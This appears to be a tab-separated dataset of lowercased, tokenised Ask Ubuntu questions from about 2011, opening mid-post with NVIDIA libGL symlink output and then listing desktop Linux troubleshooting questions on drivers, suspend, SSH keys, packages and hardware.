/usr/lib/nvidia-current/xvmcconfig current `best ' version is /usr/lib/nvidia-current/ld.so.conf . ~ > ls -la /etc/alternatives/gl_conf lrwxrwxrwx 1 root root 34 2010-09-08 18:51 /etc/alternatives/gl_conf - > /usr/lib/nvidia-current/ld.so.conf ~ > cat /usr/lib/nvidia-current/ld.so.conf /usr/lib/nvidia-current /usr/lib32/nvidia-current ~ > this is the layout of /usr/lib/libgl symlinks when everything is working correctly : ~ > ls -la /usr/lib/libgl* -rw-r -- r -- 1 root root 487480 2010-01-17 08:07 /usr/lib/libglew.a lrwxrwxrwx 1 root root 16 2010-05-02 05:25 /usr/lib/libglew.so - > libglew.so.1.5.2 lrwxrwxrwx 1 root root 16 2010-05-02 05:22 /usr/lib/libglew.so.1.5 - > libglew.so.1.5.2 -rw-r -- r -- 1 root root 358456 2010-01-17 08:07 /usr/lib/libglew.so.1.5.2 lrwxrwxrwx 1 root root 13 2010-09-08 18:25 /usr/lib/libgl.mesa.so - > mesa/libgl.so lrwxrwxrwx 1 root root 32 2011-07-15 23:34 /usr/lib/libgl.so - > /usr/lib/nvidia-current/libgl.so lrwxrwxrwx 1 root root 34 2011-07-16 19:01 /usr/lib/libgl.so.1 - > /usr/lib/nvidia-current/libgl.so.1 -rw-r -- r -- 1 root root 929838 2010-04-29 07:54 /usr/lib/libglu.a lrwxrwxrwx 1 root root 11 2010-05-16 18:38 /usr/lib/libglu.so - > libglu.so.1 lrwxrwxrwx 1 root root 20 2010-05-16 18:38 /usr/lib/libglu.so.1 - > libglu.so.1.3.070701 -rw-r -- r -- 1 root root 461488 2010-04-29 07:54 /usr/lib/libglu.so.1.3.070701 when i for example remove and install libglfw2 only the libgl.so.1 link changes to point to libgl.mesa.so : ~ > sudo apt-get remove libglfw2 ; sudo apt-get install libglfw-dev reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libglfw-dev libglfw2 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . [ ... ] the following extra packages will be installed : libglfw2 the following new packages will be installed : libglfw-dev libglfw2 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0b/86.6kb of archives . after this operation , 360kb of additional disk space will be used . selecting previously deselected package libglfw2 . ( reading database ... 727685 files and directories currently installed . ) unpacking libglfw2 ( from ... /libglfw2_2.6-2_amd64.deb ) ... selecting previously deselected package libglfw-dev . unpacking libglfw-dev ( from ... /libglfw-dev_2.6-2_amd64.deb ) ... setting up libglfw2 ( 2.6-2 ) ... setting up libglfw-dev ( 2.6-2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place ~ > afterwards this is the /usr/lib/libgl* layout : ~ > ls -la /usr/lib/libgl* -rw-r -- r -- 1 root root 487480 2010-01-17 08:07 /usr/lib/libglew.a lrwxrwxrwx 1 root root 16 2010-05-02 05:25 /usr/lib/libglew.so - > libglew.so.1.5.2 lrwxrwxrwx 1 root root 16 2010-05-02 05:22 /usr/lib/libglew.so.1.5 - > libglew.so.1.5.2 -rw-r -- r -- 1 root root 358456 2010-01-17 08:07 /usr/lib/libglew.so.1.5.2 lrwxrwxrwx 1 root root 13 2010-09-08 18:25 /usr/lib/libgl.mesa.so - > mesa/libgl.so lrwxrwxrwx 1 root root 32 2011-07-15 23:34 /usr/lib/libgl.so - > /usr/lib/nvidia-current/libgl.so lrwxrwxrwx 1 root root 13 2011-07-16 20:15 /usr/lib/libgl.so.1 - > libgl.mesa.so -rw-r -- r -- 1 root root 929838 2010-04-29 07:54 /usr/lib/libglu.a lrwxrwxrwx 1 root root 11 2010-05-16 18:38 /usr/lib/libglu.so - > libglu.so.1 lrwxrwxrwx 1 root root 20 2010-05-16 18:38 /usr/lib/libglu.so.1 - > libglu.so.1.3.070701 -rw-r -- r -- 1 root root 461488 2010-04-29 07:54 /usr/lib/libglu.so.1.3.070701 ~ >
53356	how do i add an application to a specific sub-category of dash	i tried to use `` main menu '' for this but while it was added to `` main menu '' it does n't display in dash in the similarly named sub category .
53358	how to compile c & c++ programs ?	i read somewhere that i need to install 'build essential packager ' & so i tried : sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but the file still wont compile or run ... gcc -wall -w -werror factorial.cpp -o factorial . gives me : gcc -wall -w -werror factorial.cpp -o factorial . factorial.cpp:3:22 : fatal error : iostream.h : no such file or directory compilation terminated this is my piece of code : //wap to demonstrate static member for calculating factorial # include < iostream.h > # include < conio.h > class fact { int i ; static int count ; public : void calculate ( ) { long int fact1=1 ; count++ ; for ( i=0 ; i < =count ; i++ ) { fact1=fact1*i ; } cout < < `` \nfactorial of '' < < count < < `` = '' < < fact1 < < `` \n '' ; } } ; int fact : : count ; void main ( ) { int i ; clrscr ( ) ; fact f ; for ( i=1 ; i < =15 ; i++ ) { f.calculate ( ) ; } getch ( ) ; } what shoud i do.. ? ? ?
53364	command to rebuild all dkms modules for all installed kernels ?	occasionally , my system gets into a state where some kernels are missing a module or two , because dkms somehow forgot to compile those modules for that kernel . rather than spend time diagnosing the problem , it would be nice if there was a single command i could run that woudl just rebuild every dkms-controlled module for every installed kernel . is there such a command ?
53369	how do i figure out why ubuntu is crashing on me randomly ?	ubuntu keeps crashing on me randomly . it just crashed 3 times in a row . can someone please help me jolt down why . when it crashes , the pc just freezes . mouse pointer goes un-responsive and i have to do a hard reboot everytime . the syslog was huge . system crashed at 23:45 . i have uploaded it to pastebin . view system log thanks for any help . i am using ubuntu 11.04 natty . unity interface . kernel v 2.6.38-8-generic edit shafee @ shafee-pc : ~ $ lspci | grep network 04:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) i on a dell n4010
53372	suspend/hibernate does n't work on an asus laptop	i 'm having issues suspending ubuntu 11.04 ( natty narwhal ) on my new asus u30sd-xa1 laptop . it 's a new laptop on the market . is this a known issue and is there a fix for it ? basically , whenever i close or put the laptop to sleep , the screen goes black but the video card does n't actually turn off , and then the fan spins even faster than before and gets hot . i did see that some people were having similar issues on other laptops and they set the kernel back . i 'm newish to ubuntu , and i 'm not super comfortable messing with the kernel . i am not using the 520m nvidia driver , because it wo n't load unity after it 's installed . i 've also heard quite a few bad things about the drivers on the ubuntu forums , so i deactivated the driver .
53376	a published fix for 11.04 classic graphics mode only partly repairs my problem	the published fix ( fix ubuntu / linux mint forgetting the theme ) for the classic graphics mode as outlined below only partially fixed my problem . with the fix in place , top panel remains in high graphics mode for less than ten seconds . it then reverts to the dull `` no effects '' style . however the files beneath the places menu remain in high graphics mode as do files on the desktop . any assistance would be gratefully received . thank you . my graphics card is a radeon hd5770 hdmi with proprietry driver installed open a terminal and paste this ( i would have said to use alt + f2 but in unity , you ca n't paste inside the alt + f2 dialog ) : gksudo gedit /etc/xdg/autostart/gnome-settings-daemon.desktop in the gnome-settings-daemon.desktop file , replace the following line : exec=/usr/lib/gnome-settings-daemon/gnome-settings-daemon with this : exec=bash -c `` sleep 5 ; /usr/lib/gnome-settings-daemon/gnome-settings-daemon '' source
53377	bluetooth mouse not auto-reconnecting	i have a nice little bluetooth mouse , but there is one problem . when it is not used for awhile ( i primarily use keyboard ) it turns off . fine , so i have to turn it back on by pushing the button . but when i do i find that it does not get recognized by ubuntu again until i click `` connect '' for that device specifically under the bluetooth-applet . i have a bluetooth touchpad+keyboard combo that i use with another ubuntu computer that des not have this issue . is there any reason mwhy this might be the case ? it 's very annoying .
53378	kubuntu freezes - probably because of networkmanager	i 've noticed kde seems to be freezing when dropping out of my ppp0 ( mobile broadband ) connection . the drop outs happens quite often ever since i installed ubuntu/kubuntu 11.04 ( both distributions ) , so i have a feeling it 's not my modem or my isp causing the drop outs . since i do get disconnected often kde freezes just as often , which will force me to leave kubuntu 11.04 until it 's fixed . i will try kubuntu 10.04 if possible to see if it 's better there and report back here . until then , anyone has any suggestions ?
53379	mouse clicks after movement	i have had a problem since i installed 10.10 on my laptop . i now run 11.4 . when i move the mouse cursor , it clicks a couple seconds after i come to a rest . i can move the mouse , throw my hands up in the air , and the cursor will click where ever it is pointing . this makes typing a real pain , even typing this the mouse put my text cursor in different places . i thought this was a problem with my physical mouse pad , but i used a external usb mouse and i did the same thing .
53386	why does my apache folder show two configuration files ?	when i cd to /etc/apache2/ i can see two configuration files : apache2.conf and httpd.conf . the apache.conf file has many configuration directives within ( that makes me think it 's the main configuration file ) while the other ( httpd.conf ) has none ( actually , it has just one that i added a while ago ... namely servername localhost ) . is this ok ? can i be sure that any changes made in the apache2.conf file will be effective ? thanks in advance
53391	integration for thunderbird 5 ?	thunderbird 5 is a really good program but are there any plans to `` integrate '' it with 11.04 like evolution is integrated ?
53396	applications stop drawing after a few seconds	not sure how well i can explain this , but on my lenovo x61 tablet ( intel graphics ) on kubuntu 11.04 applications within kde seem to freeze after a few seconds of use . moving the mouse cursor to cause some kind of ui element to update seems to cause all frozen applications to continue redrawing a for a few more seconds . for example moving the mouse over a scroll bar or hovering over another window seems to trigger redrawing . in addition this only happens when compositing is disabled on kwin . i would leave compositing enabled to work around the issue , but i would assume that would increase power consumption of the laptop . a quick way to reproduce the issue for me is to run zdoom ( software renderer ) and the freeze will occur shortly . another program i noticed the issue with is xournal ( randomly stops drawing until aforementioned triggers at which point all lines drawn appear ) . i modified zdoom to print something to the terminal continuously and that solves the issue indicating that the driver might be ignoring screen updates ? is this a known issue and is there a known work around ( outside of using opengl compositing of course ) ?
53400	how to remotely control banshee via ssh ?	banshee has the ability to control its main window from the command line using commands like $ banshee -- next however when running these commands over ssh as the same user it simply tries to launch banshee . is there a way to push through to the other session when logged in with an ssh session . i 'm guessing this is more of an ssh/tty thing than a banshee thing but if it can be done i 'd love to know . edit : export $ ( strings /proc/*/environ| grep dbus_session | tail -1 ) seems to work in my use case . note there is a lot of permission denied output but you can ignore that . via : http : //machine-cycle.blogspot.com/2010/12/ssh-and-dbus-sessions.html if anyone has a cleaner fix would love to see it .
53403	vlc 's image appears darker in ubuntu than in windows	when i 'm using ubuntu 11.04 on the same computer as my windows 7 , it shows videos a little darker than usual . i have a dell laptop . the problem starts after about 10 to 15 minutes into the movie .
53405	how do i install the ubuntu one control panel ?	is it possible to install the new ubuntu one control panel in ubuntu versions 10.04 or 10.10 ? i referred this page , but it suggests of installing nightly builds , while i 'll prefer to have stable builds .
53414	how do i sync an external drive using ubuntu one ?	at present on my laptop i have a dual boot xp and ubuntu and from ubuntu i would like to sync folders on my xp partition use ubuntu one but the option is not available when right click on any file or folder in the xp partition . is it possible to do this and how .
53425	why is my monitor not detected ?	i have a laptop and just got a new lcd ( samsung 22 '' sa350 series ) . i connected my laptop to the new monitor using a vga cable but it appears that ubuntu does n't detect it ? it works in windows . i noticed that the monitor will only get a signal once windows is loaded though .
53426	java process hangs after exiting eclipse	on my machine whenever i work with eclipse ( on suns jdk ) , the java process does not terminate after i exit eclipse . therefore after working on several projects over the day , i sometimes need to kill all those java processes manually to free my ram again . this bugs me for about 2 years now , while all these parts have gone through different versions : ubuntu eclipse ( and all the installed plugins ) suns jdk i 've even tried to attach a vm debugger to the java processes to see what 's going on , but had no success . although it would be nice to find the reason for the problem , i 'm meanwhile more interested in a workaround to automatically kill those processes once a day . i imagine a script to kill the java processes , but to make some exceptions depending on the command line parameters of the java process ( e.g . i have subsonic and the playstation media server running all the time ) . what are your ideas to automatically ( and selectively ) kill the java processes ?
53427	native resolution not occupying the entire screen	i just got a new monitor . the native resolution seems to be 1920x1080 ( 16:9 ) . but when i set that , ubuntu occupies only part of the screen , leaving a black border around . when i try setting another resolution like 1680 x 1050 ( 16:10 ) , it fills the entire screen . but perhaps its a bit stretched out ?
53430	the shortcut keys for cut , copy , and paste do n't work in some applications	i have problem with my shortcut keys for cut , copy , and paste . they does not work on netbeans and some other applications . i have to click the right mouse button and select the operations from the context menu . i thought this problem comes from unity , so i switch to the classic gnome session , but this did n't help .
53431	why does waking up from suspend take a long time ?	sometimes when i suspend my laptop it wakes up instantly , but other times it takes around 5 minutes to wake up - in any case way longer than a cold boot . while the laptop is waking up i can hear the hard drive working and when my laptop finally does wake up the system load is at 100 % . strangely my memory is half empty ( even if it was 3/4 full ( not counting cache ) when i suspend the laptop ) but my swap is n't ( i have 4gbs of ram and this is the only time i see swap not being empty ) . it seems to me that while waking up my laptop sometimes starts thrashing , but i have no idea what is causing it , how to prevent it or even how to debug it . my laptop is a hp elitebook 8730w . edit : here is a screenshot of the system load indicator when i get to my desktop . there is at least 1.8gb of ram free but there is 1.4gb in swap , why is that so ?
53435	boot hangs after `` checking battery state ... ''	the boot process of my installation hangs after the checking battery state ... message . i can continue to boot using alt + f5 , then logging in , and typing startx . after that everything works as expected , but this is irritating . reading around , this error appears to be reasonably common , however it is normally associated with nvidia drivers/etc . whereas i qm using an intel chipset . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 02 ) any suggestions would be most appreciated .
53436	ca n't change the icon theme	i 'm running ubuntu 11.04 on virtualbox and i cant ' change the nautilus icons . i 've followed a lot of tutorials ... but nothing works . i can only see the icons i 've choosen when i run gksudo nautilus but not when i 'm a normal user any suggestions ? this is what it looks like when i 'm a normal use : this is how it should look like :
53437	what kind of themes can i use on xfce ?	i do n't like the themes i have in my system ( xubuntu 11.04 ) by default . is xfce look the only place where i can get new themes ? can i run themes that are made for gnome , for example ?
53442	how can i configure the aiptek t-6000u graphics tablet ?	i followed aiptektablet instructions on the ubuntu wiki to configure 11.04 for use with my graphics tablet . i installed the xserver-xorg-input-aiptek package and created two files with the options detailed on the wiki page above : $ cat /lib/udev/rules.d/69-xserver-xorg-input-aiptek.rules action ! = '' add|change '' , goto= '' xorg_aiptek_end '' kernel ! = '' event [ 0-9 ] * '' , goto= '' xorg_aiptek_end '' attrs { idvendor } == '' 08ca '' , env { x11_driver } = '' aiptek '' , symlink+= '' input/aiptektablet '' label= '' xorg_aiptek_end '' $ cat /usr/share/x11/xorg.conf.d/50-aiptek.conf section `` inputclass '' identifier `` pen '' matchproduct `` aiptek|aiptek|aiptek '' matchdevicepath `` /dev/input/event* '' driver `` aiptek '' option `` usb '' `` on '' option `` type '' `` stylus '' option `` mode '' `` absolute '' option `` zmin '' `` 0 '' option `` zmax '' `` 511 '' endsection the 50-aiptek.conf file was originally called 10-aiptek.conf as in the wiki , but an aiptek tablet installation help thread on the ubuntu forums , suggested changing 10 to 50 . any ideas ? thank you .
53443	how do i ignore a proxy if not available ?	following the instructions in best way to cache apt downloads on a lan ? , i 've set up a caching proxy in my local network . since that machine is not always up , i 'd like to be able to refresh the sources list and install packages without using that proxy if unavailable . i 've already read the acquire group section in the manual page of apt.conf ( 5 ) , but i could n't find an option like `` silent-fail '' . at the moment , sudo apt-get update and related commands fail because no connection could be established . so how do i configure the client so that the proxy is ignored if it 's not available ?
53444	how can i measure the execution time of a terminal process ?	i 'm trying to measure the execution time of a process that i call via the command line ( i.e. , i want to find out how long it takes to for the process to finish ) . is there any command that i can add to the command calling the process that will achieve this ?
53451	can i install the xubuntu 10.04 theme on ubuntu 11.04 ?	i love the xubuntu 10.04 theme and i want to install it on my ubuntu 11.04 . it 's possible to install only the theme ?
53452	how do i enable webgl in firefox ?	i 've got firefox 5 installed on my ubuntu 11.04 system . i would like to have webgl working , which is not right now : this website just gives me a grey page : http : //webglsamples.googlecode.com/hg/aquarium/aquarium.html i 've got it working on google-chrome using the nvidia proprietary drivers , so there must be a way to get it to work on the same system in firefox .
53456	easy to way to get overview of partitions ' contents without mounting them manually ?	background : i am installing ubuntu on an ssd . i have two other spinning hard drives in my box as well . one of these contain an older install of ubuntu . for some reason nautilus does n't auto mount the file systems on the other drives when i am browsing the file system . maybe it 's because i am already at the partitioning step of the installer . question : how can i easily check the contents of the file systems before deciding which partition to mount at which mount point . i would for example like to re-use my old /home partition . i would prefer something that requires less manual work than mounting my partitions manually . earlier when i 've run the installation cd it has somehow been able to mount all my partitions automatically . i figured maybe i could activate this script manually if i knew where it was .
53460	firefox blocks my nvidia drivers moz_glx_ignore_blacklist	when i load a webgl website on firefox 5 in my ubuntu 11.04 system , i get a grey screen and a warning on the terminal like this : [ glx ] your gl driver is currently blocked . if you would like to bypass this , define the moz_glx_ignore_blacklist environment variable . acceleration works fine on google chrome . how can i enable back acceleration for firefox ?
53462	using ipod in banshee alongside itunes ?	i 'm running ubuntu ( 11.04 ) and banshee ( up-to-date from the banshee team ppa ) , and i have a 1st gen ipod touch ( version 3.1.3 7e18 ) . up until now i 've synced and managed the ipod using my macbook pro . however , my music collection has begun to outgrow the macbook 's disk space , so i 've been considering my alternatives ... what i 've been thinking of doing is moving my entire music collection to my ubuntu box - which has a much larger hard-drive - and using banshee to manage my music and sync it to my ipod . however , i would still like to install and manage apps on my ipod too , so i presume i will still need to connect the ipod to itunes on the macbook occasionally too . so i guess my question is : is it possible to use ubuntu banshee to manage music on my ipod and mac itunes to manage apps on it , without the two conflicting or otherwise messing up the contents of the ipod ? ( and if so , any suggestions about what options to use in either bits of software would be much appreciated . for example , in itunes will i need to set music syncing to `` manual '' ? ) thanks in advance , thoughton .
53463	ssh problem after update	setting up openssh-server ( 1:5.3p1-3ubuntu7 ) ... creating ssh2 rsa key ; this may take some time ... creating ssh2 dsa key ; this may take some time ... start : job failed to start ca n't initialize ssh , already tried reinstall . ssh server is started manually via /etc/init.d/ssh start netstat -nlp shows that no services are running at tcp port 22
53468	which new features and changes are planned for unity in 11.10 ?	reading the planet and several blogs regularly , and also testing 11.10 , it still is not clear to me what is planned for unity in 11.10 . when going to launchpad , no blueprints are available and the open bugs are mostly just fixes or backlog from 11.04 . that makes me wonder what is planned for unity in 11.10 at all ? is there any public documentation available about this topic ? or could some developers make a statement here ? it would undoubtedly be very interesting for many to get some information on this !
53470	swapping control and windows ( super ) keys not working in unity	if i open the keyboard app , than go to layouts and click options , under alt/win key behavior , there is an option to swap the control and windows key . this seems to work when using classic gnome but fails when using ubuntu unity .
53472	how do i enable s-video output ?	i installed ubuntu 11.04 on an old dell inspiron 700m . everything works fine , except i can seem to figure out how to enable s-video output . function keys , which control s-video in windows , are non-functional . can you give me a step by step or advise if this functionality is not available for this video chip in ubuntu ?
53474	backlight no longer works on upgrade from ubuntu 10.10 to 11.04	i think something changed in maybe the linux core which has broken ubuntu and practically every other linux install on my laptop . the problem is that suddenly the back-light does n't work when i run ubuntu . this means that i can faintly see the ubuntu login screen but as the screen is n't emitting light its impossible to use . there is a way i can use it . if i jump into the - grub ? - menu when pressing shift on start up i can choose a previous version of linux / ubuntu and it all runs fine . unfortunately ... without doing that it does n't work . i have tried a variety of installs including kubuntu - i thought this had a different display or gui thing but no dice . has anyone heard of this happening to other people ? is there a fix around ? its an emachines e525 laptop .
53481	how can i connect to my wifi connection if i am unable to find it in the network manager ?	i am a newbie and i just started using the latest ubuntu . i have a pavilion dm1 hp netbook and ca n't find my wifi connection in the network manager . when i open the `` network '' thing , there 's no `` auto etho '' no `` wireless networks '' or `` enable wireless '' and when i go to edit connections then to `` wireless '' i ca n't find my wifi connection , does this mean there 's an issue with the wifi itself and how can i fix it ? ethernet controller : realtek ... . . network controller ralink corp. device 539f at the end , the others are practicly the same usb controllers , pci bridges , isa brige , vga and other stuff , but the more important are the two that i noted earlier since they 're the network related ones .
53483	hp envy beats edition can play cds , but not dvds	after a fresh install , and various other tests ( troubleshooting ) , i have concluded that my laptop ( an hp envy 14 - beats edtion ) will not play dvds , however it will play cds . when i first got the laptop , up until recently it played dvds perfectly , i doubt there is a hardware issue sees as it loads the dvds and can view the files in them , but not play them , as well as read and work with cds perfectly . was there an update or something of the like that may have caused this ? if so , is there a fix ? i typically use this laptop 's hdmi out with my tv as a dvd player ... so it would be very beneficial if there was a solution to this problem . there was a similar issue with the touchpad that there was a fix for ... so i 'm hoping that this is something similar
53484	how to add a scrollable table in libreoffice impress ?	i want to copy/paste a table from libreoffice writer that is two pages long into libreoffice impress but i want it to be shown inside one slide . in this slide i will have the ability to scroll the table so i can show the rest of the table . right now if i copy the table over it goes outside the slide size and goes all the way down so the rest of the table is not shown in the slide show .
53487	is it possible to save a disk image of a windows machine to an ubuntu server on the same network ?	one of the features of windows home server that is attractive to me is the ability to automatically save a disk image of a connected machine to the server . would something like this be possible when using an ubuntu server ?
53488	wubi vs `` proper '' installation '' ?	why should a dual-booter do a `` proper '' ubuntu installation instead of through wubi ? in other words , how is a `` proper '' installation better ( for both , the user and ubuntu community/canonical ) ? please help .
53489	where is `` temp1 '' located ?	i have all sorts or temperature indicators , one for each core and two for the gpu . but one is just showing `` temp1 '' is there a way to know what temp one is showing ? i 'm using indicator applet complete 0.4.12 to see the temperatures . when i ran sensors-detect i noticed that there was a virtual device . and `` temp1 '' has the same critical temperatures . $ sudo find /sys -iname `` *temp1* '' /sys/devices/virtual/hwmon/hwmon0/temp1_input /sys/devices/virtual/hwmon/hwmon0/temp1_crit
53495	flash crashes on enabling webcam	for ages , i 've been having problems getting my webcam to play with websites that use flash . the cam works fine with programs like camorama , but when i try to use it on a flash site , flash always crashes regardless of the browser used ( chrome , firefox , opera ) . i used to use the workaround described here , but since upgrading to 11.04 , even that does n't work any more . i 've tried installing the latest flash beta using the firefox flash-aid plugin , to no effect . when running firefox in a terminal and try to test my cam on a website like testmycam.com , i get the following error when flash crashes : ! ! ! abort : x_getwindowattributes : badwindow ( invalid window parameter ) ; 2 requests ago : file /build/buildd/firefox-5.0+build1+nobinonly/build-tree/mozilla/toolkit/xre/nsx11errorhandler.cpp , line 199 using flash version 10.3.181.36 and firefox 5.0
53497	laptop battery message estimating forever or appears twice	my dell stays at estimating forever and sometimes appears twice mentioning the same problem ! . it does not change to some time or percent . what do i need to change this ?
53498	how to change the refresh rate at which the network manager updates the wireless access points	sometimes it takes too long for the network manager to update to see new wireless ap . is it possible to change the time interval between checks ?
53499	how to merge multiple internet connections into one	my pc has 2 wired cards . both gigalan . it also has 2 wireless cards . one broadcom with proprietary drivers and ralink with open software ( which works much better than broadcom ) . my cellphone can share its connection wirelessly to my pc . but i also have a wired connection . so i have multiple connections that i can use to have internet . how can i merge 2 or more connections together and balance them to enjoy one unified internet experience that it is the sum of all internet connections connected to it . for example if i have a modem with an internet connection of 1024kb/sec and another one that offers 512kb/sec and one small one that offers 128kb/sec , after load balancing and merging all connections ( bonding or teaming ) , i could download at a speed of 1664kb/sec using all 3 internet connections as one for example . this question has always intrigued me . just to add some links : project for teaming teaming added to kernel 3.3 many enhancements for teaming in kernel 3.5 enhancements to teaming in kernel 3.6 support for bonding on ipv6 in kernel 3.7 bonding network interface ( planned ) update - i has been more than a year after i wrote this question . there has been several changes to the way networking works on linux and how it shows on ubuntu . for example , on ubuntu 13.04 we can now see something like this : as we can see , we now have the option for bonding or for bridging . i have not been able to test this out because i am not in any place with 2 or more connections , but a small guide that shows results will be very helpful .
53504	what 's the difference between the chromium ppa and the chromium offered in the universe repo ?	are there differences between this chromium ppa ( https : //launchpad.net/~chromium-daily/+archive/stable ) and the one in the universe repository ? are there reasons to choose one over the other ? since the ppa is maintained by ubuntu developers i assume it 's as safe as anything coming from the universe repository .
53507	fn keys f9 - f12 do not work on an asus u30sd	using the keyboard utility i was able to select the asus layout and after that i was able to get the majority of the function keys to work ( screen brightness , wifi , sleep , num lock , and scroll lock ) . however f9 - f12 ( disable/enable trackpad , volume mute , up , and down ) do not work . does anybody have a fix for that ? i 've tried the eeepc scripts to see if that would work but it does n't seem to do anything so far . update : after some digging i found some reference to an old acpi edit : http : //forum.eeeuser.com/viewtopic.php ? id=3573 i was able to follow the instructions however the first instruction requires that you change power management to have the acpid and acmd options filled . but this does n't appear to be in latest version of ubuntu . does anyone happen to know where to select these options ? or is there another script that i would need to edit somewhere ? also i 've checked the asus downloads page and they do n't appear to have anything for linux on their site available for download . any help with this would be appreciated . update 2 aug 2 2011 : i upgraded to the ubuntu 11.10 alpha and it looks like my volume hotkeys are working ... . i 'm not sure what 's difference is between 11.04 11.10 keyboard settings ... but i guess they 've figured it out ...
53508	how can i make a program run at startup in only one definite session that uses the same desktop environment as others ?	i installed ( aware of the risks ) software from the elementary team ppas and i set up a pantheon shell session , which is based on gnome . i would like to have plank ( a fork of docky ) to run at startup for this session , but not when i 'm logging into unity or the classic gnome session . adding plank to the startup applications list makes it run in every gnome-based session . thanks for your help !
53515	problems using efax to send a fax	when using efax to send a pdf file i get the following messages efax-0.9a : 17:12:39 opened /dev/ttys0 efax-0.9a : 17:12:45 sync : dropping dtr efax-0.9a : 17:12:50 sync : sending escapes efax-0.9a : 17:12:55 error : sync : modem not respond
53517	getting on screen keyboard when click on text entry field	i have an acer iconia w500 tab that i installed ubuntu on . its working great except one thing - when i click on a text entry field , the on screen keyboard does not pop up as did on windows . anyone have a solution ? thanks in advance
53519	how do i verify the pgp downloaded signature of the truecrypt setup file with seahorse ?	i have successfully completed steps 1-4 in an attempt to verify the pgp signature of a downloaded truecrypt setup file . but i ca n't figure out how to complete step 5 using seahorse . does anyone know how to verify the downloaded signature using seahorse ? i downloaded the .sig file to my desktop . to verify a pgp signature , follow these steps : create a private pgp key download our pgp public key from our server . sign the imported key with your private key to mark it as trusted . download the digital signature verify the downloaded signature
53521	stuck in classic mode ?	i installed ubuntu 11.04 in the latest virtualbox ( as of today ) on my xp host . i ran it , and it told me on login that i did n't have a good enough computer to use the new `` unity '' thing . i logged on and everything went fine , it looked like 10.04 . i then logged on in classic mode , to see what it does , but now i ca n't find the setting to log on the way it was before , even when i selct ubuntu ( not classic ) at logon thanks in advance edit it looks like this :
53522	11.04 shuts down after around 15 minutes of online video or less , every single time	i installed 11.04 ( my first experience with ubuntu , please go easy on me.. ) only a few days ago after vista crashed on my computer . i installed flash and all the correct plug-ins as far as i can tell because the videos begin playing just fine . but when watching youtube videos one after another , or an episode on hulu or anything , without fail after around 15 minutes ( the first time ; every following time i turn the computer back on afterwards takes less time to shut down ) spontaneously i see a black screen with grey writing that i can barely read before it just shuts down . this happens in firefox and chromium . please help , this is so frustrating .
53523	how to redirect a url to a custom ip address ?	i have an ubuntu machine that i 'm using as my home internet router . it uses a usb mobile broadband modem as its internet connection , and shares this with another router ( via the router 's `` internet '' port ) which i use as my lan . how do i redirect requests from within my lan for a given url to a custom ip address ( ex have google.com redirect to x.x.x.x ) ?
53524	ubuntu one will not sync a file over 100mb ( evolution backup tar.gz )	it just says `` file sync in progress '' and it does n't change and other files are not getting backed up . if i disconnect , delete ( and from the trash ) the file in question , the backup eventually completes when all is uploaded . this is a problem because i like to take a weekly backup of my email and keep the last two ... . thanks
53526	how can i fix some broken packages pyqt packages ?	i 'm trying to install pyqt but i 've met some difficulties ( i.e packages that wo n't be updated and stuff like that ) . i 'm not very proficient with ubuntu , so some help is needed . here 's the output i get from the terminal : sudo apt-get install python-qt4 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-qt4 : depends : libqt4-declarative ( > = 4:4.7.0~rc1 ) but it is not going to be installed depends : libqt4-designer ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-help ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-script ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-scripttools ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-svg ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-test ( > = 4:4.7.0 ) but it is not going to be installed depends : libqt4-xmlpatterns ( > = 4:4.7.0 ) but it is not going to be installed e : broken packages
53527	ca n't mount a not copy protected dvd video ?	i 'm trying to mount a dvd video that has no kind of copy protection on it . it plays just fine in windows and in dvd players . if i insert a regular data dvd it automounts just fine and i can browse it . i 've installed regionfree , followed the restrictedformatsplayingdvds wiki , and fiddled with this thing for hours to no avail . -- edit -- this is the error i get trying to load the dvd stream in mplayer from the cli manyxcxi @ portland : ~ $ mplayer dvd : // mplayer 1.0rc4-4.5.2 ( c ) 2000-2010 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing dvd : // . libdvdread : using libdvdcss version 1.2.10 for dvd access libdvdnav : dvdopenfileudf : udffindfile /video_ts/video_ts.ifo failed libdvdnav : dvdopenfileudf : udffindfile /video_ts/video_ts.bup failed libdvdread : ca n't open file video_ts.ifo . ca n't open vmg info ! no stream found to handle url dvd : // exiting ... ( end of file ) it appears to just be plain not seeing it as a valid disc .
53530	what are ssh keys and how to handle them ?	i 've been in the linux world quite a while now ( little more than 10 years ) , but there are several concepts that i still ca n't grasp . one of them is ssh ... i know the basics about it ( creation , backup , restoring , revoking ) , but i wanted to ask if someone could answer me some easy questions [ 1 ] : is it ok to have more than one ssh key ? ( i currently have one for launchpad , and another for github for each computer i use ) is it necessary to use different keys for each computer , or can i simply use the same on all of them ? ( making the key , backing it up , and then restoring said backup in other computers ) what is the worst that could happen if i forgot to revoke an ssh certificate ? ( for instance if my password-free computer is stolen and i forgot to backup the revocation key ) ps : i was asked some of this questions by some friends that have recently turned to ubuntu , and i felt pretty dumb not being able to answer them . [ 1 ] : almost everything on the net assumes that you now everything about ssh .
53532	how to copy old user account to new user account ?	my old user account is not working at all some corrupted files i guess ... the other 2 accounts are working normal . so i create a new admin account and i wonder how can i copy all my settings , passwords , files from old admin account to new account . i cant use old admin account gets frozen very badly so will help lots if i can do the migration from new admin account . thanx !
